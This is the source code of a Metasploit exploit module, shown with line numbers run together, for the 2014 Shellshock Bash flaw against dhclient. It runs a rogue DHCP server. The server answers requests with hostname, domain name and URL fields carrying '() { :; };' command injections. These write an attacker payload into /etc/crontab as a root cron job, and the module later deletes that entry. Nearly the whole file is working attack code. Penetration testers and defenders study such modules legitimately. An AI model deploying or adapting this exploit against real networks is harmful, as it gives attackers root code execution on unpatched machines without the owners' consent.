Path: blob/master/modules/exploits/unix/dhcp/bash_environment.rb
19611 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::DHCPServer910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Dhclient Bash Environment Variable Injection (Shellshock)',15'Description' => %q{16This module exploits the Shellshock vulnerability, a flaw in how the Bash shell17handles external environment variables. This module targets dhclient by responding18to DHCP requests with a malicious hostname, domainname, and URL which are then19passed to the configuration scripts as environment variables, resulting in code20execution. Due to length restrictions and the unusual networking scenario at the21time of exploitation, this module achieves code execution by writing the payload22into /etc/crontab and then cleaning it up after a session is created.23},24'Author' => [25'Stephane Chazelas', # Vulnerability discovery26'egypt' # Metasploit module27],28'License' => MSF_LICENSE,29'Platform' => ['unix'],30'Arch' => ARCH_CMD,31'References' => [32[ 'CVE', '2014-6271' ],33[ 'CWE', '94' ],34[ 'OSVDB', '112004' ],35[ 'EDB', '34765' ],36[ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],37[ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],38[ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]39],40'Payload' => {41# 255 for a domain name, minus some room for encoding42'Space' => 200,43'DisableNops' => true,44'Compat' => {45'PayloadType' => 'cmd',46'RequiredCmd' => 'generic telnet ruby'47}48},49'Targets' => [ [ 'Automatic Target', {}] ],50'DefaultTarget' => 0,51'DisclosureDate' => '2014-09-24',52'Notes' => {53'Stability' => [CRASH_SAFE],54'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],55'Reliability' => [REPEATABLE_SESSION],56'AKA' => ['Shellshock']57}58)59)6061deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')6263self.needs_cleanup = true64end6566def on_new_session(session)67print_status 'Cleaning up crontab'68# XXX this will brick a server some day69session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")70end7172def exploit73hash = datastore.copy74# Quotes seem to be completely stripped, so other characters have to be75# escaped76p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }77echo = "echo -e #{(Rex::Text.to_hex('*') + ' ') * 5}root #{p}>>/etc/crontab"78hash['DOMAINNAME'] = "() { :; };#{echo}"79if hash['DOMAINNAME'].length > 25580raise ArgumentError, 'payload too long'81end8283hash['HOSTNAME'] = "() { :; };#{echo}"84hash['URL'] = "() { :; };#{echo}"85start_service(hash)8687sleep 2 while @dhcp.thread.alive?88end89end909192